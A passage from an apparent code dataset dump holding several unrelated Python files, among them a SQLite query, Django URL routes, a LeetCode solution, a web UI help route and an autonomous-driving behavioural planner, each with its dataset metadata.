]","sub_path":"deepdive/udf/extract_content.py","file_name":"extract_content.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"622347236","text":"import sqlite3\n\n\nresult = []\nconn = sqlite3.connect(\"arquivo.db\")\ntry:\n sql = \"SELECT id, latitude, longitude, dtRegister, numSats, altitude, horizontalDil \\\n FROM latlng \\\n ORDER BY datetime(dtRegister) DESC LIMIT 1\"\n row = conn.cursor().execute(sql).fetchone()\n if row:\n print(row)\n\nfinally:\n conn.close()\n\n\n","sub_path":"sqlite/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"61873522","text":"import gi\ngi.require_version('Gdk', '3.0')\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nfrom types import MethodType\n\n\ndef setup_info_bar(window):\n \"\"\"Create a Gtk.InfoBar on the bottom with an info label.\"\"\"\n window.info_bar = Gtk.InfoBar(no_show_all=True)\n window.info_msg = Gtk.Label(\"\")\n window.info_ok_btn = window.info_bar.add_button(\"OK\", Gtk.ResponseType.OK)\n window.show_message = MethodType(show_message, window)\n\n content_area = window.info_bar.get_content_area()\n content_area.add(window.info_msg)\n\n window.info_bar.connect('response', MethodType(on_info_bar_response, window))\n window.info_bar.hide()\n window.info_msg.show()\n\ndef on_info_bar_response(self, info_bar, response_id):\n info_bar.hide()\n\ndef show_message(self, message):\n self.info_msg.set_text(message)\n self.info_bar.show()\n self.info_ok_btn.grab_focus()\n","sub_path":"gui/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"417571182","text":"# Examine the code given to you. Determine what arguments must be passed into\n# isX1 and isX2 respectively to obtain an output of true for both, and pass in\n# the arguments accordingly.\n\nx = 3\n\n\ndef isX1(num):\n x = 5\n return num == x\n\n\ndef isX2(num):\n return num == x\n\n\none = isX1() # add code in parathesis\ntwo = isX2() # add code in parathesis\n\nprint(one) # true\nprint(two) # true\n","sub_path":"01_Functions_and_Execution_Context/03-passingArguments.py","file_name":"03-passingArguments.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"162694248","text":"\nclass Solution:\n def find_first_bigger(self, heaters: List[int], left: int, right: int, target: int) -> int:\n while left < right:\n mid = left + int((right - left) / 2)\n if heaters[mid] >= target:\n right = mid\n else:\n left = mid + 1\n return left\n\n def findRadius(self, houses: List[int], heaters: List[int]) -> int:\n heaters.sort()\n min_rad = -1\n for house in houses:\n right_option = self.find_first_bigger(heaters, 0, len(heaters) - 1, house)\n left_option = right_option - 1\n if left_option < 0:\n new_rad = abs(heaters[right_option] - house)\n else:\n new_rad = min(abs(heaters[right_option] - house), abs(heaters[left_option] - house))\n min_rad = max(min_rad, new_rad)\n return min_rad","sub_path":"leetcode/2nd_Round/475.py","file_name":"475.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"454299588","text":"import logging\n\nimport monasca_setup.agent_config\nimport monasca_setup.detection\n\nlog = logging.getLogger(__name__)\n\n\nclass HostAlive(monasca_setup.detection.ArgsPlugin):\n \"\"\" Setup an host_alive check according to the passed in args.\n Despite being a detection plugin this plugin does no detection and will be a noop without arguments.\n Expects two space seperated arguments hostname and type. Type can be either 'ssh' or 'ping'. For example:\n 'monasca-setup -d hostalive -a \"hostname=remotebox type=ping\"'\n \"\"\"\n\n def _detect(self):\n \"\"\"Run detection, set self.available True if the service is detected.\n \"\"\"\n self.available = self._check_required_args(['hostname', 'type'])\n\n def build_config(self):\n \"\"\"Build the config as a Plugins object and return.\n \"\"\"\n config = monasca_setup.agent_config.Plugins()\n log.info(\"\\tEnabling {type} host check for {hostname}\".format(**self.args))\n # Since the naming in the args and in the config don't match build_instance is only good for dimensions\n instance = self._build_instance([])\n instance.update({'name': \"{hostname} {type}\".format(**self.args),\n 'host_name': self.args['hostname'],\n 'alive_test': self.args['type']})\n config['host_alive'] = {'init_config': None, 'instances': [instance]}\n\n return config\n\n","sub_path":"monasca_setup/detection/plugins/host_alive.py","file_name":"host_alive.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"273530496","text":"from django.conf.urls import url\nfrom . import views\nfrom django.views.generic import RedirectView\n\napp_name = 'my_exrate'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^my_exrate/$', views.index, name='index'),\n url(r'^login$', views.user_login, name='user_login'),\n url(r'^logout$', views.user_logout, name='user_logout'),\n url(r'^register$', views.register, name='register'),\n url(r'^(?P[a-z]{2})$', views.lang_change, name='lang_change'),\n url(r'^user_register$', views.user_register, name='user_register'),\n url(r'^user_check$', views.user_check, name='user_check'),\n url(r'^favicon\\.ico$', RedirectView.as_view(url='/static/image/favicon.ico')),\n # url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n url(r'^(?P[0-9]+)/results/$', views.results, name='results'),\n url(r'^(?P[0-9]+)/vote/$', views.vote, name='vote'),\n url(r'^(?P[0-9]+)/matplotlib', views.matplotlib, name='matplotlib'),\n url(r'^(?P[0-9]+)/plotly', views.plotly, name='plotly'),\n url(r'^(?P[0-9]+)/rate_by_week', views.rate_by_week, name='rate_by_week'),\n url(r'^rate_by_day$', views.rate_by_day, name='rate_by_day'),\n # url(r'^my_exrate/amcharts/$', views.amcharts, name='amcharts'),\n url(r'^(?P[0-9]+)/amcharts$', views.amcharts, name='amcharts'),\n url(r'^my_exrate/csv_file/$', views.csv_file, name='csv_file'),\n url(r'^my_exrate/rate_select/$', views.rate_select, name='rate_select'),\n url(r'^my_exrate/rate_insert/$', views.rate_insert, name='rate_insert'),\n url(r'^my_exrate/rate_delete/$', views.rate_delete, name='rate_delete'),\n url(r'^my_exrate/rate_update/$', views.rate_update, name='rate_update'),\n url(r'^server_upd$', views.server_upd, name='server_upd'),\n]\n","sub_path":"my_exrate/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"77228924","text":"from xml.etree import ElementTree\n\nfrom PySide.QtGui import *\nimport requests\nimport view\nimport sys\n\nclass Controller(QWidget):\n\n def __init__(self, parent=None):\n \"\"\"\n Der Konstruktor\n \"\"\"\n super().__init__(parent)\n self.myForm = view.Ui_Form()\n self.myForm.setupUi(self)\n\n def submit(self):\n headers = headers = {\"content-type\": \"application/json\"}\n params = {\"origin\": self.myForm.start, \"destination\": self.myForm.ziel, \"language\": \"de\", \"sensor\": \"false\"}\n res = requests.get(\"http://maps.googleapis.com/maps/api/directions/json\", params, headers=headers)\n instructions = \"\"\n res2 = res.json()\n for key in res2[\"duration\"]:\n instructions += key\n\n self.myForm.textBrowser.setHtml(instructions)\n\n def reset(self):\n self.myForm.start.setText(\"\")\n self.myForm.ziel.setText(\"\")\n self.myForm.textBrowser.setHtml(\"\")\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n c = Controller()\n c.show()\n sys.exit(app.exec_())","sub_path":"Rest2/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"562483247","text":"from app import apfell, links, use_ssl\nfrom sanic import response\nfrom jinja2 import Environment, PackageLoader\nfrom sanic_jwt.decorators import scoped, inject_user\nfrom app.routes.routes import respect_pivot\nimport urllib.parse\n\nenv = Environment(loader=PackageLoader('app', 'templates'))\n\n\n@apfell.route(\"/apiui/command_help\")\n@inject_user()\n@scoped(['auth:user', 'auth:apitoken_user'], False) # user or user-level api token are ok\nasync def apiui_command_help(request, user):\n template = env.get_template('apiui_command_help.html')\n if len(request.query_args) != 0:\n data = urllib.parse.unquote(request.query_args[0][1])\n print(data)\n else:\n data = \"\"\n if use_ssl:\n content = template.render(links=await respect_pivot(links, request), name=user['username'], http=\"https\",\n ws=\"wss\", config=user['ui_config'], view_utc_time=user['view_utc_time'], agent=data)\n else:\n content = template.render(links=await respect_pivot(links, request), name=user['username'], http=\"http\",\n ws=\"ws\", config=user['ui_config'], view_utc_time=user['view_utc_time'], agent=data)\n return response.html(content)\n\n# add links to the routes in this file at the bottom\nlinks['apiui_command_help'] = apfell.url_for('apiui_command_help')\n","sub_path":"apfell-docker/app/routes/api_routes.py","file_name":"api_routes.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"76937558","text":"import torch\nimport torch.nn as nn\nfrom graph_utils import get_action_edges\nfrom networks.MLP import MultiLayerPerceptron as MLP\n\n\nclass GraphActor(nn.Module):\n def __init__(self,\n node_embed_dim: int,\n use_ef_init: bool,\n ef_init_dim: int):\n\n super(GraphActor, self).__init__()\n self.node_embed_dim = node_embed_dim\n self.use_ef_init = use_ef_init\n self.ef_init_dim = ef_init_dim\n self.actor_input_dim = self.node_embed_dim * 2 + self.use_ef_init * self.ef_init_dim\n self.actor = MLP(input_dimension=self.actor_input_dim,\n output_dimension=1,\n num_neurons=[],\n out_activation='ReLU', )\n\n def actor_func(self, edges):\n if self.use_ef_init:\n policy_input = [edges.src['node_feature'], edges.dst['node_feature'], edges.data['ef_init']]\n else:\n policy_input = [edges.src['node_feature'], edges.dst['node_feature']]\n policy_input = torch.cat(policy_input, dim=1)\n logits = self.actor(policy_input) # shape [n_actions x 1]\n action_probs = logits.softmax(0) # shape [n_actions x 1]\n return {'action_probs': action_probs}\n\n def forward(self, graph, node_feature):\n graph.ndata['node_feature'] = node_feature\n action_edges = get_action_edges(graph)\n graph.apply_edges(func=self.actor_func, edges=action_edges)\n action_probs = graph.edges[action_edges].data['action_probs'] # shape [n_actions x 1]\n action_probs = action_probs.squeeze(dim=1) # shape [n_actions]\n\n _ = graph.ndata.pop('node_feature')\n _ = graph.edata.pop('action_probs')\n\n return action_probs\n","sub_path":"networks/GraphActor.py","file_name":"GraphActor.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"284405578","text":"#!/usr/bin/env python3\nimport numpy as np\nimport math\nfrom traffic_light_detector import TrafficLightState\nfrom utils import transform_world_to_ego_frame, to_rot, rotate_z, rotate_x\nfrom enum import Enum\n\n###############################################################################\n# DECLARATION OF FSM STATES\n###############################################################################\nclass FSMState(Enum):\n FOLLOW_LANE = 0\n DECELERATE_AND_STOP = 1\n STOP_FOR_OBSTACLES = 2\n\n###############################################################################\n# DECLARATION OF USEFUL CONSTANTS\n###############################################################################\nDIST_TO_TL = 15 # distance (m) for evaluating nearest traffic light to stop at \nDIST_STOP_TL = 4 # minimum distance (m) from the traffic light to which we want to stop for a RED light\nTL_Y_POS = 3.5 # distance (m) on the Y axis for the traffic light check.\nDIST_TO_PEDESTRIAN = 3 # distance (m) from the nearest pedestrian within we have to stop\n\n###############################################################################\n# DECLARATION OF MAIN CLASS FOR BP PLANNER\n###############################################################################\nclass BehaviouralPlanner:\n def __init__(self, lookahead, lead_vehicle_lookahead):\n self._lookahead = lookahead # distance (m) for looking at next waypoint\n self._follow_lead_vehicle_lookahead = lead_vehicle_lookahead # distance (m) for looking at a lead vehicle\n self._state = FSMState.FOLLOW_LANE # current state of the FSM which implements the bp\n self._follow_lead_vehicle = False # flag used in order to indicate if there's a lead vehicle to be followed\n self._obstacle_on_lane = False # flag used in order to indicate if there's an entity crossing our trajectory\n self._goal_state = [0.0, 0.0, 0.0] # x-y-speed of the next waypoint to reach\n self._goal_index = 0 # index of the next waypoint to reach\n self._lightstate = TrafficLightState.NO_TL # current state of the nearest traffic light\n\n self._depth_images = None # images of depth cameras -> format: {camera_name:image}\n self._current_box = None # current detected traffic light box -> format: {camera_name:box}\n self._cameras_params = {} # parameters of depth camera used in camera projection geometry -> format: {name:params}\n self._inv_intrinsic_matrices = {\"CameraDEPTH_TL\":None, \"CameraDEPTH_FRONT\":None} # inverse of intrinsic matrices used in camera projection geometry\n\n # Rotation matrix to align image frame to camera frame\n rotation_image_camera_frame = np.dot(rotate_z(-90 * math.pi /180),rotate_x(-90 * math.pi /180))\n\n image_camera_frame = np.zeros((4,4))\n image_camera_frame[:3,:3] = rotation_image_camera_frame\n image_camera_frame[:, -1] = [0, 0, 0, 1]\n\n # Lambda Function for transformation of image frame in camera frame \n self._image_to_camera_frame = lambda object_camera_frame: np.dot(image_camera_frame, object_camera_frame)\n \n def set_lookahead(self, lookahead):\n self._lookahead = lookahead\n\n def set_lightstate(self, lighstate):\n self._lightstate = lighstate\n\n def set_depth_imgs(self, depth_imgs):\n self._depth_images = depth_imgs\n \n def set_current_box(self, box):\n if box!=[]: self._current_box = box\n \n def set_cameras_params(self, depth_info):\n self._cameras_params = depth_info\n\n for k in list(depth_info.keys()):\n # Calculate Inverse Intrinsic Matrix for both depth cameras\n f = self._cameras_params[k][\"w\"] /(2 * math.tan(self._cameras_params[k][\"fov\"] * math.pi / 360))\n Center_X = self._cameras_params[k][\"w\"] / 2.0\n Center_Y = self._cameras_params[k][\"h\"] / 2.0\n\n intrinsic_matrix = np.array([[f, 0, Center_X],\n [0, f, Center_Y],\n [0, 0, 1]])\n\n self._inv_intrinsic_matrices[k]=np.linalg.inv(intrinsic_matrix)\n\n def get_tl_stop_goal(self, waypoints, ego_state, closest_index, goal_index):\n \"\"\"\n Checks whether the vehicle is near a traffic light and returns a waypoint index near to it or \n None if no waypoints are found. The check is done 15 meters from the traffic light. \n If so, the one that is located at most 5 meters from the intersection is chosen as the target waypoint\n so it is possible to stop at an acceptable distance.\n\n Args:\n waypoints: list of the waypoints on the path\n ego_state: (x, y, yaw, current_speed) of the vehicle\n closest_index: index of the nearest waypoint\n goal_index: index of the current goal waypoint\n\n Returns:\n [int]: index of the waypoint target\n \"\"\"\n \n # recover estimated TL location\n tl_pos = self.get_tl_pos()\n\n if tl_pos is not None:\n tl_pos = tl_pos[0]\n # For each waypoint from the closest to the goal we want to check if there is a traffic light that we have to manage\n for i in range(closest_index, goal_index):\n waypoint_loc_relative = transform_world_to_ego_frame(\n [waypoints[i][0], waypoints[i][1], 0],\n [ego_state[0], ego_state[1], 0.0],\n [0.0, 0.0, ego_state[2]]\n )\n # We calculate the distance between the current waypoint and the current traffic light\n dist_spot = np.linalg.norm(np.array([waypoint_loc_relative[0] - tl_pos[0], waypoint_loc_relative[1] - tl_pos[1]]))\n # If this distance is smaller than DIST_TO_TL, we spot the traffic light\n if dist_spot < DIST_TO_TL:\n # But we also check if it is ahead of ego or behind. If ahead, we choose a stop waypoint.\n if tl_pos[0] > 0 and tl_pos[1] <= TL_Y_POS:\n print(f\"TL ahead. Position: {tl_pos}\")\n for j in range(i, len(waypoints)):\n waypoint_loc_relative = transform_world_to_ego_frame(\n [waypoints[j][0], waypoints[j][1], waypoints[j][2]],\n [ego_state[0], ego_state[1], 0.0],\n [0.0, 0.0, ego_state[2]]\n )\n if np.linalg.norm(np.array([waypoint_loc_relative[0] - tl_pos[0], waypoint_loc_relative[1] - tl_pos[1]])) < DIST_STOP_TL:\n print(f\"TL Stop Waypoint: {j} {waypoints[j]}\")\n return j\n # Otherwise we stop checking.\n else:\n return None\n return None\n\n def get_tl_pos(self):\n \"\"\"This function estimates the position of the nearest traffic light, \n combining informations from detector e depth cameras.\n\n Returns:\n position in the vehicle frame or None if no boxes are detected\n \"\"\"\n if self._current_box is None: return None # NO_TL\n\n cam_name = list(self._current_box.keys())[0] # name of the camera on which box is detected\n box = list(self._current_box.values())[0] # detected box\n # recover corresponding depth image infos\n depth_image = self._depth_images[cam_name] \n inv_intrinsic_matrix = self._inv_intrinsic_matrices[cam_name]\n camera_params = self._cameras_params[cam_name]\n \n # recover box parameters\n xmin, ymin, xmax, ymax = box.get_bounds()\n xmin = xmin*400\n xmax = xmax*400\n ymin = ymin*400\n ymax = ymax*400\n\n # recover distance and pixel position of the TL\n depth = 1000 #Distance of the sky\n for i in range(int(xmin), int(xmax+1)):\n for j in range(int(ymin), int(ymax+1)):\n if j < 400 and i < 400:\n if depth > depth_image[j][i]:\n y = j\n x = i\n depth = depth_image[y][x]\n\n pixel = [x, y, 1]\n pixel = np.reshape(pixel, (3,1))\n \n depth = depth_image[y][x] * 1000 # Consider depth in meters \n\n if depth!=1000:\n # Projection Pixel to Image Frame\n image_frame_vect = np.dot(inv_intrinsic_matrix,pixel) * depth\n\n # Create extended vector\n image_frame_vect_extended = np.zeros((4,1))\n image_frame_vect_extended[:3] = image_frame_vect \n image_frame_vect_extended[-1] = 1\n\n # Projection Image to Camera Frame\n camera_frame = self._image_to_camera_frame(image_frame_vect_extended)\n camera_frame = camera_frame[:3]\n camera_frame = np.asarray(np.reshape(camera_frame, (1,3)))\n\n camera_frame_extended = np.zeros((4,1))\n camera_frame_extended[:3] = camera_frame.T \n camera_frame_extended[-1] = 1\n \n # Projection Camera to Vehicle Frame\n camera_to_vehicle_frame = np.zeros((4,4))\n camera_to_vehicle_frame[:3,:3] = to_rot([camera_params[\"pitch\"], camera_params[\"yaw\"], camera_params[\"roll\"]])\n camera_to_vehicle_frame[:,-1] = [camera_params[\"x\"], camera_params[\"y\"], camera_params[\"h\"], 1]\n\n vehicle_frame = np.dot(camera_to_vehicle_frame, camera_frame_extended)\n vehicle_frame = vehicle_frame[:3]\n vehicle_frame = np.asarray(np.reshape(vehicle_frame, (1,3)))\n\n return vehicle_frame\n else: return None\n \n def get_new_goal(self, waypoints, ego_state):\n \"\"\"this function computes the next goal waypoint, based on current state of the vehicle\n\n Args:\n waypoints: list of the waypoints on the path\n ego_state: (x, y, yaw, current_speed) of the vehicle\n\n Returns:\n [int]: index of the waypoint target\n \"\"\"\n # First, find the closest index to the ego vehicle.\n closest_len, closest_index = get_closest_index(waypoints, ego_state)\n\n # Next, find the goal index that lies within the lookahead distance along the waypoints.\n goal_index = self.get_goal_index(waypoints, ego_state, closest_len, closest_index)\n while goal_index < (len(waypoints) - 1) and waypoints[goal_index][2] <= 0.1:\n goal_index += 1\n\n return closest_index,goal_index\n\n def update_goal(self, waypoints, goal_index, speed=None):\n \"\"\"Updates the internal goal state given the waypoints and the goal index.\n\n Args:\n waypoints: list of the waypoints on the path\n goal_index: index of the waypoint target\n speed ([float], optional): speed to have in the gal waypoint. Defaults to None.\n \"\"\"\n self._goal_index = goal_index\n self._goal_state = waypoints[goal_index]\n\n if speed is not None:\n self._goal_state[2] = speed\n\n def transition_state(self, waypoints, ego_state, closed_loop_speed):\n \"\"\"Handles state transitions and computes the goal state. \n \n args:\n waypoints: current waypoints to track (global frame). \n length and speed in m and m/s.\n (includes speed to track at each x,y location.)\n format: [[x0, y0, v0],\n [x1, y1, v1],\n ...\n [xn, yn, vn]]\n example:\n waypoints[2][1]: \n returns the 3rd waypoint's y position\n\n waypoints[5]:\n returns [x5, y5, v5] (6th waypoint)\n ego_state: ego state vector for the vehicle. (global frame)\n format: [ego_x, ego_y, ego_yaw, ego_open_loop_speed]\n ego_x and ego_y : position (m)\n ego_yaw : top-down orientation [-pi to pi]\n ego_open_loop_speed : open loop speed (m/s)\n closed_loop_speed: current (closed-loop) speed for vehicle (m/s)\n variables to set:\n self._goal_index: Goal index for the vehicle to reach\n i.e. waypoints[self._goal_index] gives the goal waypoint\n self._goal_state: Goal state for the vehicle to reach (global frame)\n format: [x_goal, y_goal, v_goal]\n self._state: The current state of the vehicle.\n available states: \n FOLLOW_LANE : Follow the global waypoints (lane).\n DECELERATE_AND_STOP : Decelerate to stop.\n STOP_FOR_OBSTACLES : Stay stopped until there's an obstacle on the lane.\n \"\"\"\n # In this state, continue tracking the lane by finding the\n # goal index in the waypoint list that is within the lookahead\n # istance. Then, check to see if there's a pedestrian/vehicle that \n # intersects our trajectory, in this case perform an emergency brake.\n # Otherwise check if there's a red traffic light; If it does, then ensure\n # that the goal state enforces the car to be stopped 5 m before the traffic light.\n if self._state == FSMState.FOLLOW_LANE:\n #print(\"State: FOLLOW_LANE\")\n\n closest_index,goal_index = self.get_new_goal(waypoints, ego_state)\n\n # if there's an agent that intersects our trajectory, stop immediately \n if self._obstacle_on_lane:\n self.update_goal(waypoints, goal_index, 0)\n print(\"State: FOLLOW_LANE -> STOP_FOR_OBSTACLES\")\n self._state = FSMState.STOP_FOR_OBSTACLES\n\n else:\n intersection_goal = None\n # if there's a red traffic light, get the waypoint at 5 m from it\n if self._lightstate == TrafficLightState.STOP:\n intersection_goal = self.get_tl_stop_goal(waypoints, ego_state, closest_index, goal_index)\n \n if intersection_goal is not None:\n self.update_goal(waypoints, intersection_goal, 0)\n print(\"State: FOLLOW_LANE -> DECEL_AND_STOP\")\n self._state = FSMState.DECELERATE_AND_STOP\n else:\n self.update_goal(waypoints, goal_index)\n \n # In this state, check if there's an agent that intersects our trajectory for stopping immediately;\n # otherwise, check if the traffic light has becomed green or is disappeared from our vision for passing in follow lane.\n # (the second case is not real but we take care of it for avoiding to remain blocked at traffic light)\n elif self._state == FSMState.DECELERATE_AND_STOP:\n #print(\"State: DECELERATE_AND_STOP\")\n\n if self._obstacle_on_lane:\n print(\"State: DECEL_AND_STOP -> STOP_FOR_OBSTACLES\")\n self._state = FSMState.STOP_FOR_OBSTACLES\n\n elif self._lightstate == TrafficLightState.GO or self._lightstate == TrafficLightState.NO_TL:\n print(\"State: DECEL_AND_STOP -> FOLLOW_LANE\")\n self._state = FSMState.FOLLOW_LANE\n\n # in this state, check if agent has released our trajectory for passing in follow lane\n elif self._state == FSMState.STOP_FOR_OBSTACLES:\n #print(\"State: STOP_FOR_OBSTACLES\")\n if not self._obstacle_on_lane:\n print(\"State: STOP_FOR_OBSTACLES -> FOLLOW_LANE\")\n self._state = FSMState.FOLLOW_LANE\n\n else: raise ValueError('Invalid state value.')\n\n # Gets the goal index in the list of waypoints, based on the lookahead and\n # the current ego state. In particular, find the earliest waypoint that has accumulated\n # arc length (including closest_len) that is greater than or equal to self._lookahead.\n def get_goal_index(self, waypoints, ego_state, closest_len, closest_index):\n \"\"\"Gets the goal index for the vehicle. \n \n Set to be the earliest waypoint that has accumulated arc length\n accumulated arc length (including closest_len) that is greater than or\n equal to self._lookahead.\n\n args:\n waypoints: current waypoints to track. (global frame)\n length and speed in m and m/s.\n (includes speed to track at each x,y location.)\n format: [[x0, y0, v0],\n [x1, y1, v1],\n ...\n [xn, yn, vn]]\n example:\n waypoints[2][1]: \n returns the 3rd waypoint's y position\n\n waypoints[5]:\n returns [x5, y5, v5] (6th waypoint)\n ego_state: ego state vector for the vehicle. (global frame)\n format: [ego_x, ego_y, ego_yaw, ego_open_loop_speed]\n ego_x and ego_y : position (m)\n ego_yaw : top-down orientation [-pi to pi]\n ego_open_loop_speed : open loop speed (m/s)\n closest_len: length (m) to the closest waypoint from the vehicle.\n closest_index: index of the waypoint which is closest to the vehicle.\n i.e. waypoints[closest_index] gives the waypoint closest to the vehicle.\n returns:\n wp_index: Goal index for the vehicle to reach\n i.e. waypoints[wp_index] gives the goal waypoint\n \"\"\"\n # Find the farthest point along the path that is within the\n # lookahead distance of the ego vehicle.\n # Take the distance from the ego vehicle to the closest waypoint into\n # consideration.\n arc_length = closest_len\n wp_index = closest_index\n\n # In this case, reaching the closest waypoint is already far enough for\n # the planner. No need to check additional waypoints.\n if arc_length > self._lookahead:\n return wp_index\n\n # We are already at the end of the path.\n if wp_index == len(waypoints) - 1:\n return wp_index\n\n # Otherwise, find our next waypoint.\n while wp_index < len(waypoints) - 1:\n arc_length += np.sqrt((waypoints[wp_index][0] - waypoints[wp_index + 1][0]) ** 2 + (\n waypoints[wp_index][1] - waypoints[wp_index + 1][1]) ** 2)\n if arc_length > self._lookahead:\n break\n wp_index += 1\n\n return wp_index % len(waypoints)\n \n # Checks to see if we need to modify our velocity profile to accomodate the lead vehicle.\n def check_for_lead_vehicle(self, ego_state, lead_car_position):\n \"\"\"Checks for lead vehicle within the proximity of the ego car, such\n that the ego car should begin to follow the lead vehicle.\n\n args:\n ego_state: ego state vector for the vehicle. (global frame)\n format: [ego_x, ego_y, ego_yaw, ego_open_loop_speed]\n ego_x and ego_y : position (m)\n ego_yaw : top-down orientation [-pi to pi]\n ego_open_loop_speed : open loop speed (m/s)\n lead_car_position: The [x, y] position of the lead vehicle.\n Lengths are in meters, and it is in the global frame.\n sets:\n self._follow_lead_vehicle: Boolean flag on whether the ego vehicle\n should follow (true) the lead car or not (false).\n \"\"\"\n # Check lead car position delta vector relative to heading, as well as\n # distance, to determine if car should be followed.\n # Check to see if lead vehicle is within range, and is ahead of us.\n if not self._follow_lead_vehicle:\n # Compute the angle between the normalized vector between the lead vehicle\n # and ego vehicle position with the ego vehicle's heading vector.\n lead_car_delta_vector = [lead_car_position[0] - ego_state[0], \n lead_car_position[1] - ego_state[1]]\n lead_car_distance = np.linalg.norm(lead_car_delta_vector)\n # In this case, the car is too far away. \n if lead_car_distance > self._follow_lead_vehicle_lookahead:\n return\n\n lead_car_delta_vector = np.divide(lead_car_delta_vector, \n lead_car_distance)\n ego_heading_vector = [math.cos(ego_state[2]), \n math.sin(ego_state[2])]\n # Check to see if the relative angle between the lead vehicle and the ego\n # vehicle lies within +/- 45 degrees of the ego vehicle's heading.\n if np.dot(lead_car_delta_vector, \n ego_heading_vector) < (1 / math.sqrt(2)):\n return\n\n self._follow_lead_vehicle = True\n\n else:\n lead_car_delta_vector = [lead_car_position[0] - ego_state[0], \n lead_car_position[1] - ego_state[1]]\n lead_car_distance = np.linalg.norm(lead_car_delta_vector)\n\n # Add a 15m buffer to prevent oscillations for the distance check.\n if lead_car_distance > self._follow_lead_vehicle_lookahead + 15:\n \n self._follow_lead_vehicle = False\n return\n # Check to see if the lead vehicle is still within the ego vehicle's\n # frame of view.\n lead_car_delta_vector = np.divide(lead_car_delta_vector, lead_car_distance)\n ego_heading_vector = [math.cos(ego_state[2]), math.sin(ego_state[2])]\n if np.dot(lead_car_delta_vector, ego_heading_vector) > (1 / math.sqrt(2)):\n return\n\n self._follow_lead_vehicle = False\n\n# Compute the waypoint index that is closest to the ego vehicle, and return\n# it as well as the distance from the ego vehicle to that waypoint.\ndef get_closest_index(waypoints, ego_state):\n \"\"\"Gets closest index a given list of waypoints to the vehicle position.\n\n args:\n waypoints: current waypoints to track. (global frame)\n length and speed in m and m/s.\n (includes speed to track at each x,y location.)\n format: [[x0, y0, v0],\n [x1, y1, v1],\n ...\n [xn, yn, vn]]\n example:\n waypoints[2][1]: \n returns the 3rd waypoint's y position\n\n waypoints[5]:\n returns [x5, y5, v5] (6th waypoint)\n ego_state: ego state vector for the vehicle. (global frame)\n format: [ego_x, ego_y, ego_yaw, ego_open_loop_speed]\n ego_x and ego_y : position (m)\n ego_yaw : top-down orientation [-pi to pi]\n ego_open_loop_speed : open loop speed (m/s)\n\n returns:\n [closest_len, closest_index]:\n closest_len: length (m) to the closest waypoint from the vehicle.\n closest_index: index of the waypoint which is closest to the vehicle.\n i.e. waypoints[closest_index] gives the waypoint closest to the vehicle.\n \"\"\"\n closest_len = float('Inf')\n closest_index = 0\n\n for i in range(len(waypoints)):\n temp = (waypoints[i][0] - ego_state[0])**2 + (waypoints[i][1] - ego_state[1])**2\n if temp < closest_len:\n closest_len = temp\n closest_index = i\n closest_len = np.sqrt(closest_len)\n\n return closest_len, closest_index\n\n# Checks if p2 lies on segment p1-p3, if p1, p2, p3 are collinear. \ndef pointOnSegment(p1, p2, p3):\n if (p2[0] <= max(p1[0], p3[0]) and (p2[0] >= min(p1[0], p3[0])) and \\\n (p2[1] <= max(p1[1], p3[1])) and (p2[1] >= min(p1[1], p3[1]))):\n return True\n else:\n return False\n","sub_path":"src/behavioural_planner.py","file_name":"behavioural_planner.py","file_ext":"py","file_size_in_byte":24122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"165604860","text":"\nimport cv2\nimport glob\nimport itertools\nimport math\nimport numpy as np\nimport os\nfrom numpy import random\nfrom PIL import Image, ImageDraw, ImageFilter, ImageFont\nfrom keras.optimizers import SGD\nfrom pathlib import Path\nfrom segmentation_models import Unet\nfrom segmentation_models.backbones import get_preprocessing\n\nfrom tqdm import tqdm\nimport panavatar\nfrom cairosvg import svg2png\nimport matplotlib.pyplot as plt\n\nimport segmentation_models as sm\n\nfrom keras.optimizers import Adam\nfrom segmentation_models import Unet\nfrom segmentation_models.backbones import get_preprocessing\nimport keras.utils\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport sys\n\nimport numpy as np\nfrom constants import DATA_DIR, train_images_path, train_segs_path, test_images_path, test_segs_path, icons_paths,model_path, BACKBONE, size, target_icons\nnp.set_printoptions(threshold=sys.maxsize)\n\npreprocess_input = get_preprocessing(BACKBONE)\n\ndef preprocess_segmentation_image(img):\n img = img[:, :, 0]\n img = img / 255\n img = img.reshape((img.shape[0], img.shape[1], 1))\n return img\n\ndef preprocess_image(img):\n img = img.astype(np.float32)\n # caffe-style preprocessing, suitable for e.g. resnet.\n # subtract imagenet mean on each color channel\n img[:, :, 0] -= 103.939\n img[:, :, 1] -= 116.779\n img[:, :, 2] -= 123.68\n return img\n\ndef prepare_data(input_img_path, output_img_path, n_examples):\n os.makedirs(str(input_img_path), exist_ok=True)\n os.makedirs(str(output_img_path), exist_ok=True)\n\n img = Image.open('pokemon.png')\n img_bw = img.copy()\n img_array = np.array(img_bw)\n 